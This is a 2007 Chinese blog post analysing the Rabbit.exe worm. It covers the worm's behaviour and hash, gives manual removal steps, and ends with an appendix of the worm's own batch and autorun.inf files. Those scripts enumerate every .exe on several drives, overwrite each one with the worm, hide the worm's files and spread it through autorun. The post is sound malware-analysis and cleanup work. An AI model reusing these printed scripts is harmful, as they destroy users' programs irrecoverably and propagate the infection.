Rabbit.exe病毒分析报告

于 2007-04-11 18:04:00 发布
阅读量655 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: AntiVirus & Reverse 文章标签: c exe cmd system command 磁盘
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/pengdawei521/article/details/1561029
本文详细分析了一种名为“兔子”的蠕虫病毒特征及其破坏行为,包括自我复制、关闭安全软件及消耗系统资源等。提供了手动清除步骤,涉及注册表修复、受感染文件清理等内容。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Rabbit.exe兔子病毒分析报告


一、基本信息


MD5c22b19f74737c6b464c1650ac633f7e1

壳:*PESHiELD 0.25 -> ANAKiN*


二、病毒特征

蠕虫,该病毒破坏用户电脑上的可执行程序(.exe)文件,破坏后的EXE文件将不可恢复,当用户中毒后,系统资源被大量消耗,使用户无法正常工作。

该病毒会关闭正在运行的IceSWord等工具软件。

该病毒也模仿了“熊猫烧香”,病毒体中留有这一句:”I LOVE Rabbit ,and you ? look:http://z82325777.diy.myrice.com/Rabbit.htm。汗!


三、病毒现象

1 自我复制:

首先将自身拷贝到系统文件夹(system32)下,改名为Rabbit.exe

system32/Rabbit.exe


2 恶意表现:

1) 在系统文件夹下生成几个文件:

C:/WINDOWS(winnt)/system32/loveRabbit .exe

C:/WINDOWS(winnt)/system32/TZ.batbat文件内容见附录)

C:/WINDOWS(winnt)/system32/LOVETZ.batbat文件内容见附录)

2) 自动运行 TZ.batLOVETZ.bat收集用户计算机C:/Program Files 文件夹 和 d: e: f: h: g: 盘下的所有EXE文件,并存到c:/windows(winnt)/msconfig1.infc:/windows(winnt)/msconfig.inf中,然后运行C:/WINDOWS(winnt)/system32/loveRabbit.exe


3) loveRabbit.exe程序

a. 生成C:/WINDOWS(winnt)/system32/msexch400.dll,然后将msexch400.dll插入到系统winlogon.exe进程中。msexch400.dll保护自身,而且启动N多进程,耗尽系统资源。

b. C:/WINDOWS(winnt)/system32/Rabbit.exe拷贝到, d:, e:, f:, c:, g:, h:盘的根目录下,并创建一个自启动文件autorun.inf(文件内容见附录)。

c. 生成C:/WINDOWS(winnt)/system32/loveRabbit.bat,以隐藏自身。

d. 生成EXE文件: C:/WINDOWS(winnt)/system32/JK.exe

e. 删除以下键值,致使系统无法进入安全模式。

HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/SafeBoot/Minimal/{4D36E967-E325-11CE-BFC1-08002BE10318}

HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/SafeBoot/Network/{4D36E967-E325-11CE-BFC1-08002BE10318}

f. 重复的删除、建立该键值:

HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Active Setup/Installed Components/{4bf41072-b2b1-21c1-b5c1-0305f4155515}/StubPath <= C:/WINDOWS/system32/JK.exe>


四、手动清除方法

1 清除病毒

1) 首先进入msconfig, regedit, 开始菜单的启动,删除所有的启动项。

删除其下的键值:

HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run

HKEY_CURRENT_USER/SOFTWARE/Microsoft/Windows/CurrentVersion/Run


再进入cmd(”开始” --> “运行”,输入cmd(command)),然后输入以下命令:

cd /windows(winnt)/system32

del JK.exe

然后重启电脑。

[或者:

cd /windows(winnt)/system32

rename loveRabbit.exe loveRabbit.vin

attrib -s -h C:/WINDOWS/system32/msexch400.dll

rename msexch400.dll msexch400.vin

然后重启电脑。

]

2) 进入cmd,然后输入:

cd /windows(winnt)/system32

del love*

del Rabbit.exe

del TZ.bat

attrib -s -h C:/WINDOWS/system32/msexch400.*

del msexch400.dll

del msexch400.vin


3) 新建一bat文件,将下面的一段内容拷贝进去保存,并运行它:

@echo 清除复活

FOR %%a in ( c: d: e: f: h: g: ) do attrib -s -h %%a/Rabbit.exe

FOR %%a in ( c: d: e: f: h: g: ) do attrib -s -h %%a/AutoRun.inf

FOR %%a in ( c: d: e: f: h: g: ) do del %%a/Rabbit.exe

FOR %%a in ( c: d: e: f: h: g: ) do del %%a/AutoRun.inf

@echo 清除被感染的文件

FOR /f "delims=" %%i in (c:/windows/msconfig.inf) do del "%%i"

FOR /f "delims=" %%i in (c:/windows/msconfig1.inf) do del "%%i"

del %0


4) 删除 c:/windows(winnt)/msconfig.infc:/windows(winnt)/msconfig1.inf


5) 注册表部分:

a. 删除子键:

HKEY_CURRENT_USER/Software/Microsoft/Active Setup/Installed Components/{4bf41072-b2b1-21c1-b5c1-0305f4155515}

HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Active Setup/Installed Components/{4bf41072-b2b1-21c1-b5c1-0305f4155515}

b. 新建子键:

HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/SafeBoot/Minimal/{4D36E967-E325-11CE-BFC1-08002BE10318},并设置其默认值为”DiskDrive”

HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/SafeBoot/Network/{4D36E967-E325-11CE-BFC1-08002BE10318},并设置其默认值为”DiskDrive”


6) 重新安装丢失的软件。


注:c:为系统盘



附录:

1 C:/WINDOWS/system32/TZ.bat文件的内容:

FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a/*.exe>>c:/windows/msconfig.inf

cd C:/Program Files

dir *.exe /s /b >>c:/windows/msconfig1.inf

LOVETZ.bat

del %0


2 C:/WINDOWS/system32/LOVETZ.bat文件的内容:

FOR /f "delims=" %%i in (c:/windows/msconfig.inf) do copy /y "C:/WINDOWS/system32/Rabbit.exe" "%%i"

FOR /f "delims=" %%i in (c:/windows/msconfig1.inf) do copy /y "C:/WINDOWS/system32/Rabbit.exe" "%%i"

del %0


3 C:/WINDOWS/system32/loveRabbit.bat文件的内容:

attrib +s +h C:/WINDOWS/system32/msexch400.dll

attrib +s +h d:/Rabbit.exe

attrib +s +h e:/Rabbit.exe

attrib +s +h c:/Rabbit.exe

attrib +s +h f:/Rabbit.exe

attrib +s +h g:/Rabbit.exe

attrib +s +h h:/Rabbit.exe

attrib +s +h e:/AutoRun.inf

attrib +s +h f:/AutoRun.inf

attrib +s +h c:/AutoRun.inf

attrib +s +h d:/AutoRun.inf

attrib +s +h h:/AutoRun.inf

attrib +s +h g:/AutoRun.inf


3 autorun.inf文件的内容:

[autorun]

Label=本地磁盘


Shellexecute=Rabbit.exe


 
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值